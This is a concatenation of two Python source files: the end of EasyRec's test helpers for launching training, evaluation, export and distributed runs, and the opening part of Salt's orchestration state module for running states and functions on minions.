  train_cmd = 'python -m easy_rec.python.train_eval --pipeline_config_path %s %s' % (
      test_pipeline_config_path, hyperparam_str)
  if check_mode:
    # BUGFIX: a leading space is required — the original '--check_mode' fused
    # with the preceding argument (e.g. '...hyperparam--check_mode')
    train_cmd += ' --check_mode'
  proc = run_cmd(train_cmd, '%s/log_%s.txt' % (test_dir, 'master'))
  proc.wait()
  if proc.returncode != 0:
    logging.error('train %s failed' % test_pipeline_config_path)
    return False
  if post_check_func:
    return post_check_func(pipeline_config)
  return True
def test_single_pre_check(pipeline_config_path, test_dir):
  """Run easy_rec.python.tools.pre_check on a shortened test config; True on success."""
  available = get_available_gpus()
  set_gpu_id(available[0] if available else None)

  if not isinstance(pipeline_config_path, EasyRecConfig):
    logging.info('testing pipeline config %s' % pipeline_config_path)
  # drop any leftover cluster spec
  os.environ.pop('TF_CONFIG', None)

  if isinstance(pipeline_config_path, EasyRecConfig):
    pipeline_config = pipeline_config_path
  else:
    pipeline_config = _load_config_for_test(pipeline_config_path, test_dir)

  # force non-distributed, single-GPU, async training
  pipeline_config.train_config.train_distribute = 0
  pipeline_config.train_config.num_gpus_per_worker = 1
  pipeline_config.train_config.sync_replicas = False

  config_util.save_pipeline_config(pipeline_config, test_dir)
  test_pipeline_config_path = os.path.join(test_dir, 'pipeline.config')
  check_cmd = 'python -m easy_rec.python.tools.pre_check --pipeline_config_path %s ' % (
      test_pipeline_config_path)
  proc = run_cmd(check_cmd, '%s/log_%s.txt' % (test_dir, 'master'))
  proc.wait()
  if proc.returncode != 0:
    logging.error('train %s failed' % test_pipeline_config_path)
    return False
  return True
def test_feature_selection(pipeline_config):
  """Run the feature-selection tool against a trained model dir; True on success."""
  model_dir = pipeline_config.model_dir
  config_path = os.path.join(model_dir, 'pipeline.config')
  output_dir = os.path.join(model_dir, 'feature_selection')
  cmd = 'python -m easy_rec.python.tools.feature_selection --config_path %s ' \
        '--output_dir %s --topk 5 --visualize true' % (config_path, output_dir)
  proc = run_cmd(cmd, os.path.join(model_dir, 'log_feature_selection.txt'))
  proc.wait()
  succeeded = proc.returncode == 0
  if not succeeded:
    logging.error('feature selection %s failed' % config_path)
  return succeeded
def yaml_replace(train_yaml_path,
                 pipline_config_path,
                 test_pipeline_config_path,
                 test_export_dir=None):
  """Rewrite the app command inside a YAML job file in place.

  Replaces *pipline_config_path* with *test_pipeline_config_path* inside the
  ``app.command`` entry (and the '{EXPOERT_DIR}' placeholder with
  *test_export_dir* when given), then writes the YAML back to
  *train_yaml_path*.
  """
  with open(train_yaml_path, 'r', encoding='utf-8') as _file:
    sample = _file.read()
  # BUGFIX: yaml.load() without an explicit Loader is unsafe on untrusted
  # input and a TypeError on PyYAML >= 6; these job files need no custom tags.
  x = yaml.safe_load(sample)
  _command = x['app']['command']
  _command = _command.replace(pipline_config_path, test_pipeline_config_path)
  if test_export_dir is not None:
    _command = _command.replace('{EXPOERT_DIR}', test_export_dir)
  x['app']['command'] = _command
  with open(train_yaml_path, 'w', encoding='utf-8') as _file:
    yaml.dump(x, _file)
def test_hdfs_train_eval(pipeline_config_path,
                         train_yaml_path,
                         test_dir,
                         process_pipeline_func=None,
                         hyperparam_str='',
                         total_steps=2000):
  """Submit an HDFS training job via el_submit and report success.

  Args:
    pipeline_config_path: path to a pipeline config file.
    train_yaml_path: el_submit YAML whose app.command is rewritten in place.
    test_dir: directory to save the adapted pipeline config into.
    process_pipeline_func: optional callable to mutate the config before saving.
    hyperparam_str: unused here; kept for signature parity with siblings.
    total_steps: training steps for the shortened run.

  Returns:
    True when el_submit exits 0, False otherwise.
  """
  gpus = get_available_gpus()
  if len(gpus) > 0:
    set_gpu_id(gpus[0])
  else:
    set_gpu_id(None)
  logging.info('testing pipeline config %s' % pipeline_config_path)
  logging.info('train_yaml_path %s' % train_yaml_path)
  # drop any leftover cluster spec
  if 'TF_CONFIG' in os.environ:
    del os.environ['TF_CONFIG']
  pipeline_config = _load_config_for_test(pipeline_config_path, test_dir,
                                          total_steps)
  logging.info('model_dir in pipeline_config has been modified')
  # force non-distributed, single-GPU, async training
  pipeline_config.train_config.train_distribute = 0
  pipeline_config.train_config.num_gpus_per_worker = 1
  pipeline_config.train_config.sync_replicas = False
  if process_pipeline_func is not None:
    assert callable(process_pipeline_func)
    pipeline_config = process_pipeline_func(pipeline_config)
  config_util.save_pipeline_config(pipeline_config, test_dir)
  test_pipeline_config_path = os.path.join(test_dir, 'pipeline.config')
  # point the job YAML at the adapted config
  yaml_replace(train_yaml_path, pipeline_config_path, test_pipeline_config_path)
  logging.info('test_pipeline_config_path is %s' % test_pipeline_config_path)
  train_cmd = 'el_submit -yaml %s' % train_yaml_path
  proc = subprocess.Popen(train_cmd.split(), stderr=subprocess.STDOUT)
  proc.wait()
  if proc.returncode != 0:
    logging.error('train %s failed' % test_pipeline_config_path)
    logging.error('train_yaml %s failed' % train_yaml_path)
  return proc.returncode == 0
def test_hdfs_eval(pipeline_config_path,
                   eval_yaml_path,
                   test_dir,
                   process_pipeline_func=None,
                   hyperparam_str=''):
  """Submit an HDFS evaluation job via el_submit and report success."""
  available = get_available_gpus()
  set_gpu_id(available[0] if available else None)

  logging.info('testing export pipeline config %s' % pipeline_config_path)
  logging.info('eval_yaml_path %s' % eval_yaml_path)
  # drop any leftover cluster spec
  os.environ.pop('TF_CONFIG', None)

  pipeline_config = _Load_config_for_test_eval(pipeline_config_path)
  if process_pipeline_func is not None:
    assert callable(process_pipeline_func)
    pipeline_config = process_pipeline_func(pipeline_config)
  config_util.save_pipeline_config(pipeline_config, test_dir)

  test_pipeline_config_path = os.path.join(test_dir, 'pipeline.config')
  # point the job YAML at the adapted config
  yaml_replace(eval_yaml_path, pipeline_config_path, test_pipeline_config_path)
  logging.info('test_pipeline_config_path is %s' % test_pipeline_config_path)

  eval_cmd = 'el_submit -yaml %s' % eval_yaml_path
  proc = subprocess.Popen(eval_cmd.split(), stderr=subprocess.STDOUT)
  proc.wait()
  if proc.returncode != 0:
    logging.error('eval %s failed' % test_pipeline_config_path)
    logging.error('eval_yaml %s failed' % eval_yaml_path)
  return proc.returncode == 0
def test_hdfs_export(pipeline_config_path,
                     export_yaml_path,
                     test_dir,
                     process_pipeline_func=None,
                     hyperparam_str=''):
    """Submit a model-export job via ``el_submit`` and wait for it.

    Args:
        pipeline_config_path: path to the EasyRec pipeline config to export.
        export_yaml_path: el_submit yaml describing the export job.
        test_dir: working directory; rewritten config and export_dir live here.
        process_pipeline_func: optional callable(pipeline_config) -> pipeline_config
            applied before saving, for test-specific tweaks.
        hyperparam_str: unused; kept for signature compatibility with callers.

    Returns:
        True if the submitted export process exited with returncode 0.
    """
    gpus = get_available_gpus()
    # Pin a single free gpu if available, otherwise force cpu-only execution.
    if len(gpus) > 0:
        set_gpu_id(gpus[0])
    else:
        set_gpu_id(None)
    logging.info('testing export pipeline config %s' % pipeline_config_path)
    logging.info('export_yaml_path %s' % export_yaml_path)
    # A stale TF_CONFIG from a previous distributed run would confuse the job.
    if 'TF_CONFIG' in os.environ:
        del os.environ['TF_CONFIG']
    pipeline_config = _Load_config_for_test_eval(pipeline_config_path)
    if process_pipeline_func is not None:
        assert callable(process_pipeline_func)
        pipeline_config = process_pipeline_func(pipeline_config)
    config_util.save_pipeline_config(pipeline_config, test_dir)
    test_pipeline_config_path = os.path.join(test_dir, 'pipeline.config')
    test_export_path = os.path.join(test_dir, 'export_dir')
    yaml_replace(export_yaml_path, pipeline_config_path,
                 test_pipeline_config_path, test_export_path)
    logging.info('test_pipeline_config_path is %s' % test_pipeline_config_path)
    # Renamed from the misleading 'eval_cmd' (copy-paste from test_hdfs_eval).
    export_cmd = 'el_submit -yaml %s' % export_yaml_path
    proc = subprocess.Popen(export_cmd.split(), stderr=subprocess.STDOUT)
    proc.wait()
    if proc.returncode != 0:
        logging.error('export %s failed' % test_pipeline_config_path)
        logging.error('export_yaml %s failed' % export_yaml_path)
    return proc.returncode == 0
def _ports_in_use(ports):
    """Return True if any of the given TCP ports is already bound locally.

    Builds an extended-regex alternation of listen addresses and greps the
    netstat listing for it; grep exits with status 0 exactly when a line
    matches, i.e. when some port is in use.
    """
    alternatives = ['0.0.0.0:%d|127.0.0.1:%d' % (p, p) for p in ports]
    pattern = '|'.join(alternatives)
    status, _ = getstatusoutput('netstat -tlnp | grep -E %s' % pattern)
    return status == 0
def _get_ports(num_worker):
    """Pick ``num_worker`` random, currently-unbound TCP ports.

    Ports are drawn from [PORT_BASE, PORT_BASE + 5000); the PORT_BASE
    environment variable (default 10000) shifts the range. Retries up to
    10 times if a drawn port is already in use.

    Returns:
        np.ndarray of num_worker port numbers.

    Raises:
        RuntimeError: if no free port set was found after all retries.
            (Previously the function fell off the loop and returned None,
            which made callers fail later with a confusing TypeError.)
    """
    port_base = int(os.environ.get('PORT_BASE', 10000))
    num_try = 10
    for _ in range(num_try):
        ports = np.random.randint(port_base, port_base + 5000, size=num_worker)
        if not _ports_in_use(ports):
            return ports
        logging.info('ports %s in use, retry...' % ports)
    raise RuntimeError('failed to allocate %d free ports after %d tries' %
                       (num_worker, num_try))
def _ps_worker_train(pipeline_config_path,
                     test_dir,
                     num_worker,
                     num_evaluator=0):
    # Launch a local parameter-server style training cluster: one
    # chief/master, (num_worker - 1) workers, one ps, and optionally one
    # evaluator, each as a separate subprocess.
    # Returns a dict mapping task name -> subprocess handle.
    gpus = get_available_gpus()
    # not enough gpus, run on cpu only
    if len(gpus) < num_worker:
        gpus = [None] * num_worker
    # one extra port for the ps task (ports[-1])
    ports = _get_ports(num_worker + 1)
    # With a dedicated evaluator the coordinating task must be 'chief';
    # otherwise tensorflow's classic 'master' (which also evaluates) is used.
    chief_or_master = 'master' if num_evaluator == 0 else 'chief'
    cluster = {
        chief_or_master: ['localhost:%d' % ports[0]],
        'worker': ['localhost:%d' % ports[i] for i in range(1, num_worker)],
        'ps': ['localhost:%d' % ports[-1]]
    }
    tf_config = {'cluster': cluster}
    procs = {}
    # NOTE: TF_CONFIG must be written to os.environ *before* each run_cmd
    # call — every subprocess inherits the environment at spawn time, so the
    # mutate-then-spawn order below is behavior-critical.
    tf_config['task'] = {'type': chief_or_master, 'index': 0}
    os.environ['TF_CONFIG'] = json.dumps(tf_config)
    set_gpu_id(gpus[0])
    train_cmd = 'python -m easy_rec.python.train_eval --pipeline_config_path %s' % pipeline_config_path
    procs[chief_or_master] = run_cmd(
        train_cmd, '%s/log_%s.txt' % (test_dir, chief_or_master))
    tf_config['task'] = {'type': 'ps', 'index': 0}
    os.environ['TF_CONFIG'] = json.dumps(tf_config)
    # ps gets no gpu (empty string hides all devices)
    set_gpu_id('')
    procs['ps'] = run_cmd(train_cmd, '%s/log_%s.txt' % (test_dir, 'ps'))
    for idx in range(num_worker - 1):
        tf_config['task'] = {'type': 'worker', 'index': idx}
        os.environ['TF_CONFIG'] = json.dumps(tf_config)
        # gpus[0] is taken by the chief/master, workers start at gpus[1]
        set_gpu_id(gpus[idx + 1])
        worker_name = 'worker_%d' % idx
        procs[worker_name] = run_cmd(train_cmd,
                                     '%s/log_%s.txt' % (test_dir, worker_name))
    if num_evaluator > 0:
        tf_config['task'] = {'type': 'evaluator', 'index': 0}
        os.environ['TF_CONFIG'] = json.dumps(tf_config)
        # evaluator runs on cpu as well
        set_gpu_id('')
        procs['evaluator'] = run_cmd(train_cmd,
                                     '%s/log_%s.txt' % (test_dir, 'evaluator'))
    return procs
def _multi_worker_mirror_train(pipeline_config_path, test_dir, num_worker):
    """Launch ``num_worker`` local processes for MultiWorkerMirrored training.

    Each worker runs easy_rec train_eval with a TF_CONFIG listing all peers.
    Returns a dict mapping worker name to its subprocess handle.
    """
    gpus = get_available_gpus()
    # not enough gpus, run on cpu only
    if len(gpus) < num_worker:
        gpus = [None] * num_worker
    ports = _get_ports(num_worker)
    worker_hosts = ['localhost:%d' % p for p in ports]
    tf_config = {'cluster': {'worker': worker_hosts}}
    train_cmd = ('python -m easy_rec.python.train_eval '
                 '--pipeline_config_path %s') % pipeline_config_path
    procs = {}
    for worker_idx in range(num_worker):
        # TF_CONFIG must be set before each spawn; children inherit it.
        tf_config['task'] = {'type': 'worker', 'index': worker_idx}
        os.environ['TF_CONFIG'] = json.dumps(tf_config)
        set_gpu_id(gpus[worker_idx])
        task_name = 'worker_%d' % worker_idx
        procs[task_name] = run_cmd(train_cmd,
                                   '%s/log_%s.txt' % (test_dir, task_name))
    return procs
def test_distributed_train_eval(pipeline_config_path,
                                test_dir,
                                total_steps=50,
                                num_evaluator=0):
    """Run a local multi-process distributed train_eval and wait for it.

    Depending on train_config.train_distribute, launches either a ps/worker
    cluster (NoStrategy) or a MultiWorkerMirrored cluster, then polls the
    subprocesses until all non-ps tasks have finished.

    Args:
        pipeline_config_path: pipeline config to test.
        test_dir: directory for the rewritten config and per-task logs.
        total_steps: training steps used when rewriting the config.
        num_evaluator: number of dedicated evaluator tasks (0 or 1).

    Returns:
        True if no task failed.
    """
    logging.info('testing pipeline config %s' % pipeline_config_path)
    pipeline_config = _load_config_for_test(pipeline_config_path, test_dir,
                                            total_steps)
    train_config = pipeline_config.train_config
    config_util.save_pipeline_config(pipeline_config, test_dir)
    test_pipeline_config_path = os.path.join(test_dir, 'pipeline.config')
    task_failed = None
    procs = None
    try:
        if train_config.train_distribute == DistributionStrategy.NoStrategy:
            num_worker = 2
            procs = _ps_worker_train(test_pipeline_config_path, test_dir,
                                     num_worker, num_evaluator)
        elif train_config.train_distribute == DistributionStrategy.MultiWorkerMirroredStrategy:
            num_worker = 2
            procs = _multi_worker_mirror_train(test_pipeline_config_path,
                                               test_dir, num_worker)
        else:
            raise NotImplementedError
        # print proc info
        assert len(procs) > 0, 'processes are empty'
        for k, proc in procs.items():
            logging.info('%s pid: %d' % (k, proc.pid))
        task_finish_cnt = 0
        task_has_finished = {k: False for k in procs.keys()}
        while True:
            for k, proc in procs.items():
                if proc.poll() is None:
                    if task_failed is not None:
                        logging.error('task %s failed, %s quit' % (task_failed, k))
                        proc.terminate()
                        # BUGFIX: terminate() does not kill instantly, so this
                        # branch could run again for the same still-alive task
                        # on the next poll and inflate task_finish_cnt; guard
                        # on task_has_finished to count each task once.
                        if k != 'ps' and not task_has_finished[k]:
                            task_has_finished[k] = True
                            task_finish_cnt += 1
                        logging.info('task_finish_cnt %d' % task_finish_cnt)
                else:
                    if not task_has_finished[k]:
                        # process quit by itself
                        if k != 'ps':
                            task_finish_cnt += 1
                            task_has_finished[k] = True
                        logging.info('task_finish_cnt %d' % task_finish_cnt)
                        if proc.returncode != 0:
                            logging.error('%s failed' % k)
                            task_failed = k
                        else:
                            logging.info('%s run successfully' % k)
            # the ps task never exits by itself, so only count workers.
            if task_finish_cnt >= num_worker:
                break
            time.sleep(1)
    except Exception as e:
        logging.error('Exception: ' + str(e))
        raise e
    finally:
        # Make sure no stray child processes survive the test.
        if procs is not None:
            for k, proc in procs.items():
                if proc.poll() is None:
                    logging.info('terminate %s' % k)
                    proc.terminate()
        if task_failed is not None:
            logging.error('train %s failed' % pipeline_config_path)
    return task_failed is None
|
saltmod.py | # -*- coding: utf-8 -*-
'''
Control the Salt command interface
==================================
This state is intended for use from the Salt Master. It provides access to
sending commands down to minions as well as access to executing master-side
modules. These state functions wrap Salt's :ref:`Python API <python-api>`.
.. versionadded:: 2016.11.0
Support for masterless minions was added to the ``salt.state`` function,
so they can run orchestration sls files. This is particularly useful when
the rendering of a state is dependent on the execution of another state.
Orchestration will render and execute each orchestration block
independently, while honoring requisites to ensure the states are applied
in the correct order.
.. seealso:: More Orchestrate documentation
* :ref:`Full Orchestrate Tutorial <orchestrate-runner>`
* :py:func:`The Orchestrate runner <salt.runners.state.orchestrate>`
'''
from __future__ import absolute_import, unicode_literals, print_function
# Import python libs
import fnmatch
import logging
import sys
import threading
import time
# Import salt libs
import salt.syspaths
import salt.exceptions
import salt.output
import salt.utils.data
import salt.utils.event
from salt.ext import six
log = logging.getLogger(__name__)
# Define the module's virtual name
__virtualname__ = 'salt'
def __virtual__():
'''
Named salt
'''
return __virtualname__
def _fire_args(tag_data):
    # Fire a 'run' event on the master event bus carrying tag_data, tagged
    # with the jid of the orchestration run that invoked this state.
    try:
        salt.utils.event.fire_args(__opts__,
                                   __orchestration_jid__,
                                   tag_data,
                                   'run')
    except NameError:
        # __orchestration_jid__ is injected only when running under the
        # orchestrate runner; outside orchestration it is simply absent,
        # and skipping the event is the intended best-effort behavior.
        log.debug(
            'Unable to fire args event due to missing __orchestration_jid__'
        )
def _parallel_map(func, inputs):
    '''
    Apply ``func`` to every element of ``inputs`` concurrently.

    One worker thread is started per input element; once every thread has
    joined, the list of results (ordered like ``inputs``) is returned.

    If a worker raised, its exception is re-raised in the calling thread.
    When several workers fail, the exception of the failing worker with the
    lowest input index wins.

    func:
        function that is applied on each input element.
    inputs:
        list of elements that shall be processed. The length of this list
        also defines the number of threads created.
    '''
    results = [None] * len(inputs)
    failures = [None] * len(inputs)

    def spawn(idx):
        def worker():
            try:
                results[idx] = func(inputs[idx])
            except:  # pylint: disable=bare-except
                failures[idx] = sys.exc_info()
        t = threading.Thread(target=worker)
        t.start()
        return t

    workers = [spawn(idx) for idx in six.moves.range(len(inputs))]
    for t in workers:
        t.join()
    for failure in failures:
        if failure is not None:
            six.reraise(failure[0], failure[1], failure[2])
    return results
def state(name,
          tgt,
          ssh=False,
          tgt_type='glob',
          ret='',
          ret_config=None,
          ret_kwargs=None,
          highstate=None,
          sls=None,
          top=None,
          saltenv=None,
          test=None,
          pillar=None,
          pillarenv=None,
          expect_minions=True,
          fail_minions=None,
          allow_fail=0,
          concurrent=False,
          timeout=None,
          batch=None,
          queue=False,
          subset=None,
          orchestration_jid=None,
          **kwargs):
    '''
    Invoke a state run on a given target

    name
        An arbitrary name used to track the state execution

    tgt
        The target specification for the state run.

        .. versionadded:: 2016.11.0

        Masterless support: When running on a masterless minion, the ``tgt``
        is ignored and will always be the local minion.

    tgt_type
        The target type to resolve, defaults to ``glob``

    ret
        Optionally set a single or a list of returners to use

    ret_config
        Use an alternative returner configuration

    ret_kwargs
        Override individual returner configuration items

    highstate
        Defaults to None, if set to True the target systems will ignore any
        sls references specified in the sls option and call state.highstate
        on the targeted minions

    top
        Should be the name of a top file. If set state.top is called with this
        top file instead of state.sls.

    sls
        A group of sls files to execute. This can be defined as a single string
        containing a single sls file, or a list of sls files

    test
        Pass ``test=true`` or ``test=false`` through to the state function. This
        can be used to override a test mode set in the minion's config file. If
        left as the default of None and the 'test' mode is supplied on the
        command line, that value is passed instead.

    pillar
        Pass the ``pillar`` kwarg through to the state function

    pillarenv
        The pillar environment to grab pillars from

        .. versionadded:: 2017.7.0

    saltenv
        The default salt environment to pull sls files from

    ssh
        Set to `True` to use the ssh client instead of the standard salt client

    roster
        In the event of using salt-ssh, a roster system can be set

    expect_minions
        An optional boolean for failing if some minions do not respond

    fail_minions
        An optional list of targeted minions where failure is an option

    allow_fail
        Pass in the number of minions to allow for failure before setting
        the result of the execution to False

    concurrent
        Allow multiple state runs to occur at once.

        WARNING: This flag is potentially dangerous. It is designed
        for use when multiple state runs can safely be run at the same time.
        Do not use this flag for performance optimization.

    queue
        Pass ``queue=true`` through to the state function

    batch
        Execute the command :ref:`in batches <targeting-batch>`. E.g.: ``10%``.

        .. versionadded:: 2016.3.0

    subset
        Number of minions from the targeted set to randomly use

        .. versionadded:: 2017.7.0

    Examples:

    Run a list of sls files via :py:func:`state.sls <salt.state.sls>` on target
    minions:

    .. code-block:: yaml

        webservers:
          salt.state:
            - tgt: 'web*'
            - sls:
              - apache
              - django
              - core
            - saltenv: prod

    Run a full :py:func:`state.highstate <salt.state.highstate>` on target
    minions.

    .. code-block:: yaml

        databases:
          salt.state:
            - tgt: role:database
            - tgt_type: grain
            - highstate: True
    '''
    # Keyword arguments forwarded to saltutil.cmd / the local state function.
    cmd_kw = {'arg': [], 'kwarg': {}, 'ret': ret, 'timeout': timeout}
    if ret_config:
        cmd_kw['ret_config'] = ret_config
    if ret_kwargs:
        cmd_kw['ret_kwargs'] = ret_kwargs
    # Skeleton of the state return dict; filled in below.
    state_ret = {'name': name,
                 'changes': {},
                 'comment': '',
                 'result': True}
    try:
        allow_fail = int(allow_fail)
    except ValueError:
        state_ret['result'] = False
        state_ret['comment'] = 'Passed invalid value for \'allow_fail\', must be an int'
        return state_ret
    cmd_kw['tgt_type'] = tgt_type
    cmd_kw['ssh'] = ssh
    cmd_kw['expect_minions'] = expect_minions
    # Pick the remote state function: highstate wins over top, top over sls.
    if highstate:
        fun = 'state.highstate'
    elif top:
        fun = 'state.top'
        cmd_kw['arg'].append(top)
    elif sls:
        fun = 'state.sls'
        if isinstance(sls, list):
            sls = ','.join(sls)
        cmd_kw['arg'].append(sls)
    else:
        state_ret['comment'] = 'No highstate or sls specified, no execution made'
        state_ret['result'] = False
        return state_ret
    # An explicit test argument takes precedence over the master's test opt.
    if test is not None or __opts__.get('test'):
        cmd_kw['kwarg']['test'] = test if test is not None else __opts__.get('test')
    if pillar:
        cmd_kw['kwarg']['pillar'] = pillar
    if pillarenv is not None:
        cmd_kw['kwarg']['pillarenv'] = pillarenv
    if saltenv is not None:
        cmd_kw['kwarg']['saltenv'] = saltenv
    cmd_kw['kwarg']['queue'] = queue
    if isinstance(concurrent, bool):
        cmd_kw['kwarg']['concurrent'] = concurrent
    else:
        state_ret['comment'] = ('Must pass in boolean for value of \'concurrent\'')
        state_ret['result'] = False
        return state_ret
    if batch is not None:
        cmd_kw['batch'] = six.text_type(batch)
    if subset is not None:
        cmd_kw['subset'] = subset
    # A masterless minion (file_client: local) cannot fan out through
    # saltutil.cmd; call the state function locally instead.
    masterless = __opts__['__role'] == 'minion' and \
        __opts__['file_client'] == 'local'
    if not masterless:
        _fire_args({'type': 'state', 'tgt': tgt, 'name': name, 'args': cmd_kw})
        cmd_ret = __salt__['saltutil.cmd'](tgt, fun, **cmd_kw)
    else:
        # Reshape the arg/kwarg layout into direct parameters of the local
        # state function, then wrap the result to mimic saltutil.cmd output.
        if top:
            cmd_kw['topfn'] = ''.join(cmd_kw.pop('arg'))
        elif sls:
            cmd_kw['mods'] = cmd_kw.pop('arg')
        cmd_kw.update(cmd_kw.pop('kwarg'))
        tmp_ret = __salt__[fun](**cmd_kw)
        cmd_ret = {__opts__['id']: {
            'ret': tmp_ret,
            'out': tmp_ret.get('out', 'highstate') if
            isinstance(tmp_ret, dict) else 'highstate'
        }}
    try:
        state_ret['__jid__'] = cmd_ret[next(iter(cmd_ret))]['jid']
    except (StopIteration, KeyError):
        pass
    # Aggregate per-minion results into fail / changes / no_change buckets.
    changes = {}
    fail = set()
    no_change = set()
    if fail_minions is None:
        fail_minions = ()
    elif isinstance(fail_minions, six.string_types):
        fail_minions = [minion.strip() for minion in fail_minions.split(',')]
    elif not isinstance(fail_minions, list):
        state_ret.setdefault('warnings', []).append(
            '\'fail_minions\' needs to be a list or a comma separated '
            'string. Ignored.'
        )
        fail_minions = ()
    if not cmd_ret and expect_minions:
        state_ret['result'] = False
        state_ret['comment'] = 'No minions returned'
        return state_ret
    for minion, mdata in six.iteritems(cmd_ret):
        if mdata.get('out', '') != 'highstate':
            log.warning('Output from salt state not highstate')
        m_ret = False
        # salt-ssh uses the 'return' key instead of 'ret'; normalize.
        if 'return' in mdata and 'ret' not in mdata:
            mdata['ret'] = mdata.pop('return')
        m_state = True
        if mdata.get('failed', False):
            m_state = False
        else:
            try:
                m_ret = mdata['ret']
            except KeyError:
                m_state = False
            if m_state:
                m_state = __utils__['state.check_result'](m_ret, recurse=True)
        if not m_state:
            if minion not in fail_minions:
                fail.add(minion)
            changes[minion] = m_ret
            continue
        try:
            # for/else: the 'else' runs only when no state item reported
            # changes, i.e. the loop completed without hitting 'break'.
            for state_item in six.itervalues(m_ret):
                if isinstance(state_item, dict):
                    if 'changes' in state_item and state_item['changes']:
                        changes[minion] = m_ret
                        break
            else:
                no_change.add(minion)
        except AttributeError:
            log.error("m_ret did not have changes %s %s", type(m_ret), m_ret)
            no_change.add(minion)
    if changes:
        state_ret['changes'] = {'out': 'highstate', 'ret': changes}
    if len(fail) > allow_fail:
        state_ret['result'] = False
        state_ret['comment'] = 'Run failed on minions: {0}'.format(', '.join(fail))
    else:
        state_ret['comment'] = 'States ran successfully.'
        if changes:
            state_ret['comment'] += ' Updating {0}.'.format(', '.join(changes))
        if no_change:
            state_ret['comment'] += ' No changes made to {0}.'.format(', '.join(no_change))
    if test or __opts__.get('test'):
        if state_ret['changes'] and state_ret['result'] is True:
            # Test mode with changes is the only case where result should ever be none
            state_ret['result'] = None
    return state_ret
def function(
        name,
        tgt,
        ssh=False,
        tgt_type='glob',
        ret='',
        ret_config=None,
        ret_kwargs=None,
        expect_minions=False,
        fail_minions=None,
        fail_function=None,
        arg=None,
        kwarg=None,
        timeout=None,
        batch=None,
        subset=None):
    '''
    Execute a single module function on a remote minion via salt or salt-ssh

    name
        The name of the function to run, aka cmd.run or pkg.install

    tgt
        The target specification, aka '*' for all minions

    tgt_type
        The target type, defaults to ``glob``

    arg
        The list of arguments to pass into the function

    kwarg
        The dict (not a list) of keyword arguments to pass into the function

    ret
        Optionally set a single or a list of returners to use

    ret_config
        Use an alternative returner configuration

    ret_kwargs
        Override individual returner configuration items

    expect_minions
        An optional boolean for failing if some minions do not respond

    fail_minions
        An optional list of targeted minions where failure is an option

    fail_function
        An optional string that points to a salt module that returns True or False
        based on the returned data dict for individual minions

    ssh
        Set to `True` to use the ssh client instead of the standard salt client

    batch
        Execute the command :ref:`in batches <targeting-batch>`. E.g.: ``10%``.

    subset
        Number of minions from the targeted set to randomly use

        .. versionadded:: 2017.7.0
    '''
    func_ret = {'name': name,
                'changes': {},
                'comment': '',
                'result': True}
    if kwarg is None:
        kwarg = {}
    # Tolerate a string 'arg' for backwards compatibility, but warn.
    if isinstance(arg, six.string_types):
        func_ret['warnings'] = ['Please specify \'arg\' as a list, not a string. '
                                'Modifying in place, but please update SLS file '
                                'to remove this warning.']
        arg = arg.split()
    cmd_kw = {'arg': arg or [], 'kwarg': kwarg, 'ret': ret, 'timeout': timeout}
    if batch is not None:
        cmd_kw['batch'] = six.text_type(batch)
    if subset is not None:
        cmd_kw['subset'] = subset
    cmd_kw['tgt_type'] = tgt_type
    cmd_kw['ssh'] = ssh
    cmd_kw['expect_minions'] = expect_minions
    cmd_kw['_cmd_meta'] = True
    if ret_config:
        cmd_kw['ret_config'] = ret_config
    if ret_kwargs:
        cmd_kw['ret_kwargs'] = ret_kwargs
    fun = name
    # Remote execution functions are never actually run in test mode.
    if __opts__['test'] is True:
        func_ret['comment'] = (
            'Function {0} will be executed on target {1} as test={2}'
        ).format(fun, tgt, six.text_type(False))
        func_ret['result'] = None
        return func_ret
    try:
        _fire_args({'type': 'function', 'tgt': tgt, 'name': name, 'args': cmd_kw})
        cmd_ret = __salt__['saltutil.cmd'](tgt, fun, **cmd_kw)
    except Exception as exc:
        func_ret['result'] = False
        func_ret['comment'] = six.text_type(exc)
        return func_ret
    try:
        func_ret['__jid__'] = cmd_ret[next(iter(cmd_ret))]['jid']
    except (StopIteration, KeyError):
        pass
    # Aggregate per-minion results into fail / changes buckets.
    changes = {}
    fail = set()
    if fail_minions is None:
        fail_minions = ()
    elif isinstance(fail_minions, six.string_types):
        fail_minions = [minion.strip() for minion in fail_minions.split(',')]
    elif not isinstance(fail_minions, list):
        func_ret.setdefault('warnings', []).append(
            '\'fail_minions\' needs to be a list or a comma separated '
            'string. Ignored.'
        )
        fail_minions = ()
    for minion, mdata in six.iteritems(cmd_ret):
        m_ret = False
        if mdata.get('retcode'):
            func_ret['result'] = False
            fail.add(minion)
        if mdata.get('failed', False):
            m_func = False
        else:
            # salt-ssh uses the 'return' key instead of 'ret'; normalize.
            if 'return' in mdata and 'ret' not in mdata:
                mdata['ret'] = mdata.pop('return')
            m_ret = mdata['ret']
            m_func = (not fail_function and True) or __salt__[fail_function](m_ret)
            if m_ret is False:
                m_func = False
        if not m_func:
            if minion not in fail_minions:
                fail.add(minion)
            changes[minion] = m_ret
    if not cmd_ret:
        func_ret['result'] = False
        # BUGFIX: this was previously assigned to the bogus 'command' key,
        # leaving 'comment' empty when no minions responded.
        func_ret['comment'] = 'No minions responded'
    else:
        if changes:
            func_ret['changes'] = {'out': 'highstate', 'ret': changes}
        if fail:
            func_ret['result'] = False
            func_ret['comment'] = 'Running function {0} failed on minions: {1}'.format(name, ', '.join(fail))
        else:
            func_ret['comment'] = 'Function ran successfully.'
        if changes:
            func_ret['comment'] += ' Function {0} ran on {1}.'.format(name, ', '.join(changes))
    return func_ret
def wait_for_event(
        name,
        id_list,
        event_id='id',
        timeout=300,
        node='master'):
    '''
    Watch Salt's event bus and block until a condition is met

    .. versionadded:: 2014.7.0

    name
        An event tag to watch for; supports Reactor-style globbing.

    id_list
        A list of event identifiers to watch for -- usually the minion ID. Each
        time an event tag is matched the event data is inspected for
        ``event_id``, if found it is removed from ``id_list``. When ``id_list``
        is empty this function returns success.

    event_id : id
        The name of a key in the event data. Default is ``id`` for the minion
        ID, another common value is ``name`` for use with orchestrating
        salt-cloud events.

    timeout : 300
        The maximum time in seconds to wait before failing.

    The following example blocks until all the listed minions complete a
    restart and reconnect to the Salt master:

    .. code-block:: yaml

        reboot_all_minions:
          salt.function:
            - name: system.reboot
            - tgt: '*'

        wait_for_reboots:
          salt.wait_for_event:
            - name: salt/minion/*/start
            - id_list:
              - jerry
              - stuart
              - dave
              - phil
              - kevin
              - mike
            - require:
              - salt: reboot_all_minions
    '''
    ret = {'name': name, 'changes': {}, 'comment': '', 'result': False}
    if __opts__.get('test'):
        ret['comment'] = \
            'Orchestration would wait for event \'{0}\''.format(name)
        ret['result'] = None
        return ret
